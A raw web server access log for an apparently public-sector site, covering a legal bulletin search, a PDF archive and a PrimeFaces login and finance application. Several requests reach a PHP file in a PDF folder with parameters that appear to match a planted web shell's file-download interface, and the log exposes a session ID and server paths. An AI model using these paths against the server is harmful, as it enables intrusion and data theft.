201.245.192.253 - - [04/Jul/2024:10:30:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4767.pdf HTTP/1.1" 200 500322
201.245.192.253 - - [04/Jul/2024:10:30:23 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Jul/2024:10:30:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.113.228 - - [04/Jul/2024:10:30:35 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
192.168.172.47 - - [04/Jul/2024:10:30:39 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7303
172.22.2.4 - - [04/Jul/2024:10:29:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
172.22.2.4 - - [04/Jul/2024:10:30:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=innovacion HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:30:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=innovaci%F3n HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:30:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=0433&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:30:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0433&usuario=&sector=&fecha=2024&resuelve= HTTP/1.1" 200 1351
172.22.2.4 - - [04/Jul/2024:10:31:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=implementacion HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:31:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=implementacion HTTP/1.1" 200 626
161.18.113.228 - - [04/Jul/2024:10:31:06 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2011%2F HTTP/1.1" 200 747162
172.22.2.4 - - [04/Jul/2024:10:31:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=implementaci%F3n HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:31:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=tecnologica HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:31:13 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=tecnologica HTTP/1.1" 200 626
172.22.2.4 - - [04/Jul/2024:10:31:13 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=PEV&fecha=2023&resuelve=tecnologica HTTP/1.1" 200 626
161.18.113.228 - - [04/Jul/2024:10:31:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5859.pdf HTTP/1.1" 200 422087
201.245.192.253 - - [04/Jul/2024:10:31:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.113.228 - - [04/Jul/2024:10:31:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 268663
161.18.113.228 - - [04/Jul/2024:10:31:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1778.pdf HTTP/1.1" 200 637429
47.128.48.40 - - [04/Jul/2024:10:31:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4512.pdf&ft=download HTTP/1.1" 200 360103
47.128.98.47 - - [04/Jul/2024:10:32:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5235.pdf&ft=download HTTP/1.1" 200 20135
216.245.221.92 - - [04/Jul/2024:10:32:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:10:32:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.102.59.197 - - [04/Jul/2024:10:32:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19VddkJ/FmH6/r7y0Ezkh5GXvsjWmaxDw+KTXMgZdJglDgzSchbL0K1H4yfhgvgfYxIgeuQoVGyHZ+TZ9I4DkinKZsQ6dPtcR4ruemfVsiDfi9jLBAcx9b9JohlB632Zqbw9oW2qyWMq1A2YkJxaV3QwnkIj+aFRBC9Kcdz7G3MJgBddQgPTBfo30WSi8q3R2OPCb+sv0UXAtv4Ll2Keqzsa9yCZLKIXlot1ZEJyemX4wTOGMcFIFxWnQBRsCxAs6vhcv8y4YB7Pg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:32:19 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18XU3slVw1Jr24E3YaeLc9KVEW3F4yYzMslFgIholXPCQtLyQaTuDCo9TXYRrcIo52z78K1+E6XbEYxbAls3dpiho52v6EX849oSZkHXVy6NSa347+h4bg4TVlmVdAu+Puyv2IlTcPJwg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 60
186.102.59.197 - - [04/Jul/2024:10:32:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+uh9pjZnnkdqAY7r4Cizo2okRPt0l34uIRbIWWy1J5r8ggb01OxZVRhdGDlWzar9mwUrbPYfBj9062hUMFipYe6UD9EFhIoQ040v8XC0tfZ91Xqe8Nd51S2CLxdQtsKAeEKhD4sw8nSqBDQOYvEMSyUVV1XkkHW7bNWoS9FD25S2rWBI3IUEPTFWk29s3lys4v+xOMy5pPLqZcBb9OSzp6TGAH7/grpzjkzIcqy9WgkvI0m1HiiTaD&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18kOuFxtTwAXDpuLJu2Z+5H3Iqp2v8DfmF6q3JijvaOwrT7YzJhsNT68m8ufDWD9jWIEuKjNqdCPnZQXc6kF0Gq1M3Q8Ovu+8vwO6ltuZPFwjZ3JEqByBpn5XfIg09RMScPO45j+NqoEfDe1EZr0wF5uwIixliLknGzyNuE/3rHzRYC14m2o+NYEtFmbtSPctI2ya1FSaxHSw==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:20 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX19fOI1xv+IcN+ER6UXudbmN97nDMvcCQkEdTXs7NH5jpEHICbN6784ItTxJezWgCrDIM1682knwMMcwbgGyHI9Axg13rZg8fZ91YCr2viscXJ9zbBG+o1bFkUw/AArWTWr8N+PZord8WbEYgQMOfEWxGMvMS6yHIeCWSyg2vsZg9eJEI4MAB+wa2F2Lhe53epdoe1hdp+aHVzN33lnBZG3+eSRsFwBabj/M5HK+0QrjuRSMoT8c0GaN2ziROutcPh0QzXEjYQuNr4SIyb3BIknOVH+EXcl6VbrAHw7dO3sbQEou+Zu+7RUGHFqwKjjL7Zc4ilLGQq8n6YzSODY+vf64QuxKN0cMHk9W9vYLRH+fmvhmWQ15YyelLuJhPnPNp6AXzzJQEnhrL7h0vZwAMczMqHHLA53Q6RA1C4TvObBb1qnvVPfVfbXdf/Q26iO9W0kTqCo1Key8sciwwqn7FOF2I/oop5NYLn19LegT1jCt4T2LAgi+RoT0aXpFHgwUs42SYRYjHJvGErxV0QO+16pl29FFWgC2Ukr3f7sWjZ+N1mFWrIvmQOAMgSk4UINGw/ZxpcVhY0i1udp6sa8gYxvpHwSPUeGxCioBcVBeAecHgRTVFbwLKtHFxZGvSKHV+8W+FF4SPF4kBTe0HiRspgCYLTRpxlU6aXXS1vAjD3/ggUTo0YrVLiqw3Nceggghbn3CJDhRFPU1RHIesndJLHE7EJU3UMg6HlHk5HqQls4gBkfaScowYVM4N261fqE/nkxmNFlewpk0JYrZqWszzeNJhIW7kbFrGpsbwRaLBft/znAsS0mDINhnQDN2fHleHg4N9bfm1ACSL0wxmfG1m/SQPGkIzZK+Cr0Y6TUWfKF3+IqxTJDutCdQSJHeL+b0yvgsnzMhQ3jzMNNamXn5jcEX4VdceWEzhyOMYQKSIhTgmd+UxBYAI9+Gb3P/QV+2Ye+x+xD8Wrqgk3lB3yIKSCIW1nFZXNqqDMQT85AKvTp9a8uPEAFZQ85KV7HJT3zQd3tJ6ctviTlJubxPYdgVT+sYEPCYTKyo2/W1c0mpSxviu9nuD8hbW2OD9sQPRniAoTA5l1clgUwsF04oTo/lOJtno9vQoc2dqEKHTnL9LtajUNvQmlalAEk4XtmaYXGTHjwZOv8GLe0tj1NbCN/2iJR9z2ERHZU3JNr8RD0NbmCFjj6/LNhTLIySGDk/hUmMm2HHBC2NYaoc5N8mNSg4bZJIEsK/f/zDAuygNY0DH/HtHtBZ8++v1lfJMqFxnjtZA5TCdWiuPjvpbm8AStLFBy/Ot/RLLNo+T3QQwjKDFQ8TwHd9diVXCwGFZTMjJOeyBIUBUXItYSdi2i9PzjC7qsGQ0Wlqi+v418s=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 60
186.102.59.197 - - [04/Jul/2024:10:32:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+VxiZtGpzCw/p4KCL7IR3gTLpzZCNkovtu4vnpcS7BIfnRMsyAhVcdnMJqpNIzN8Uk3rdRbWI0v8O2tcRa/H5Zp73pFqefKULH/PaXg2buV3iLju+x1AzKLA3r4dsQ7HaYTvHdoSDv3bLdrkV8MBVmtAw3XWGwN01cMU6o3jiytY0InhnkjzTUyTPLKUGXIM7KdVx/2I6DKg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:32:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+MNkPHEHapL4PXqIAfv7eQsnVu7lI+mx6sZjBDqiV+COYOZB2DgIDAOtL4qNXIwXrF9CDnbgpGFjwAvQndJuOevtmf8DjD/jrNxkZOELjj6h2XSRnGVxvv+701DFVC81bpsdgvgr6/jRBRzAojqWvJ9FTzYjBge9k=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:32:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+iAiMJvlWUCcjc+wkMD5+P1wxt4pyjnZCG9Slwpmx80/ITYeZTMFrHTJzEIcN6gC528UpRmEqnU/39KdMAg4ZJcubc7r30llHRrI5F0Dz7JUpyBQwPEDYE8eH/vi+20DvVvDadfmAw69iZqP0T/sHbwoWJXBPYghIkF1vBeG7Mkks1JdwR4LRK4co/EKpJFF46WN05ZhHSRadn28AnCA6yYI5RnyQTXrU=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19LVf7VipNd6275VRMOlzQ92nNmlJoUojABVBELjLrJY+4cExUdgHDz8qjhJnu7oekVS870cumX2MCrukWXzJpO1wiCXGxNBjrbwpLt441aI9K4zjVdg/wT1hoYBIY+VVkpMpLkSTdN/n1+DXMxT3TFkm4n/3IYwj69JiX7ciJVE64WOQlP8eu+yU4WBBQA5sBZq1gOXi7W2Q==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2aZ1oFT/na5ZVchT8GuhKet6lfAAzpv3FbtF9E4ErT4mtyl0hKZx6kD+GCYXBrde2BUfoQHIRJ5AuJaa2JMIB6/30kxfO1Et/29CXN09ZqbTYkTd4I2e77p4l9cQMrbXpntEQw3rYL8gLr+fEZIinQq7cVqwVXrcWHCDER4HuyF/FqwY8t5rzii7W7lTmdFkCvDWguTLPqf1ww3S2uAyAppNEWQ5X44pCYvPeY53ypNnPbu8VrlOT48PtoEg7vnc6paFx4E/mJN7mOmO2IuHfdl4cvXlgajOMUZhGLdI84wha3TXt95s5mUlxvZvBd2OxbFhAIVw76PnmzobxsG4YWynz/oC5W+bRb22fM6qmREYysOFjQmPG&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/7PPQz5jwYRYsrWfTQogpdoqUv49CIu5H4R3f1fh3/C+U/tza93TcdS6IcWpFwTvY+0PqN7CPxzGOB4ky5bZMcmhejNfU4HqzU74/5H4rN85X+RnvR1j0fvaAcczV1Pj+Zg5bsV/L1BIN7jfyr7DY+bGFHgztJjFcTRB5sWz+8svOc8vdnbXMYnGEUElrsrarfHvlN+dApvg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:32:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18YHbD2G3I9VmLGVTobijSJtT/K+pb9C59F5HV2CbUOHkH98EAjRGlIryBoINJFBfi/P9mbcRlEkRosarzNYCPF4XlVPD/I0iuiqM3NeNpyOrYTlNF4aEGXdkfR6GCUr4FF+JJF+m84tdjOrToiq4t/7HgEOgL2aBqv+JdGHhKdnvbri6DbZsmhyeE37wP1rtXJzJvXR4sjzpXOecUaQVrf8RMoHfvSqMCnmWQ3AJmCMXHNYozGaYi7K2cQ7hmoUmbqHxfSHFSxNfXfbixwrkp5Tgox/wj3eYF7FvtSkXtkMplkga0AiTFWZ1UiiHty1y2SM+diTXP7fzGCyToqMXcHLbeMWhKqIpw=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:32:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+Z+kRvdR6fOXLxR8tPtzT6Ve2bg5xmKWHiHBxeU+Gi0Qm17eIgJ3yIH9ywGHlNG3+BoBGMHkHLIhU+2CqdqyiSuPoeCdmeJrqDXkOIjX6qPTSdcIY9wfY+41OkZ3S7sPmKWLemhjLjRFmMMGAgxM9TuRGiPnSG+Wh2MkGa9QBy0T555fG4x/V+SnU6ZTgCUccqUcRnxS3jKg==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/1FkpGR5Pq3QoMSeEOqIcm1mHcrtu/P+heBrMD/2dmyI13+Guvb4XvUZgaigd2rzCAJK0E0xX6Ug6f0vowDrHPqUCgIfyawMnh/hxVPAHAAxkrM0zWQu1wApAHkArLMizlO++XYuFpeDnYZxVFKpMbCHGedCpc4tddqnudvsD6Ucx0Tts0o9J5WtC69/GKH2jgHqlD0JeS0Q==&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
186.102.59.197 - - [04/Jul/2024:10:32:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/HB2wOvZj68l/pygyB1IYNcdY5I1mOcASerXFeYbdNcW19dPrjUg2lE7jRF67bohHuQnamHxlIVNsWrtKcqP1ATSFgNSNBmYUAX+Sdjm1uWcR44rJx6MDEoLurNY6oepuP4zRlMp7Eyt0Ml8Pbl9yV6LOtAi3tlTX5cXWFoMeCtjt/wGTVnQictZ75pX5iurEcfLuMF1oJzKRo8lWjODF5AFrtljAPWWE=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 25
186.102.59.197 - - [04/Jul/2024:10:32:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19n3mtymBXwXXXdzlJQkVQjRZ8yZs9b28pRG6m/wJojlnuDUC/OuWjqchvq7pqPsGhV96SQ+ziwTIqDdUiGNbPPEA6ZdFFJZE6pLttVQQWzdqSUIdAMIgjwF63tVADHXF0+BO5l16KUCpI2UKMiDScQ0rG74kJExFId6aG99bL3a0Jxmy0N+E50hOTnfqdxph7gtPzZJADTxxLKV83a4N7GmDLKlgSKLGs=&u=U2FsdGVkX1+iE7gVRE419F8teJi/bVpdbAxUmxdM361wT6M/HZZZKA1Fm7RyDkHV&y=U2FsdGVkX1+j7fMVwQQgT3dN924G24yK8msyvXKmq/3iqJK683Jnewj5pgRz1ETV HTTP/1.1" 200 26
47.128.125.32 - - [04/Jul/2024:10:32:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6414.pdf&ft=download HTTP/1.1" 200 356007
201.245.192.253 - - [04/Jul/2024:10:32:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.255 - - [04/Jul/2024:10:32:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2434.pdf&ft=download HTTP/1.1" 200 20135
216.244.66.195 - - [04/Jul/2024:10:32:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1131.pdf HTTP/1.1" 200 332397
201.245.192.253 - - [04/Jul/2024:10:33:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
186.154.34.111 - - [04/Jul/2024:10:33:17 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 14105
201.245.192.253 - - [04/Jul/2024:10:33:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [04/Jul/2024:10:33:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1183.pdf HTTP/1.1" 200 432738
201.245.192.253 - - [04/Jul/2024:10:34:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12409
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:14 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [04/Jul/2024:10:34:16 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16164
201.245.192.253 - - [04/Jul/2024:10:34:16 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:16 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [04/Jul/2024:10:34:17 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.244.66.195 - - [04/Jul/2024:10:34:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1782.pdf HTTP/1.1" 200 341062
201.245.192.253 - - [04/Jul/2024:10:34:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:10:34:33 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:33 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
201.245.192.253 - - [04/Jul/2024:10:34:34 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 55040
201.245.192.253 - - [04/Jul/2024:10:34:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1544
201.245.192.253 - - [04/Jul/2024:10:34:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 123921
201.245.192.253 - - [04/Jul/2024:10:34:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:10:34:48 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [04/Jul/2024:10:35:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 166525
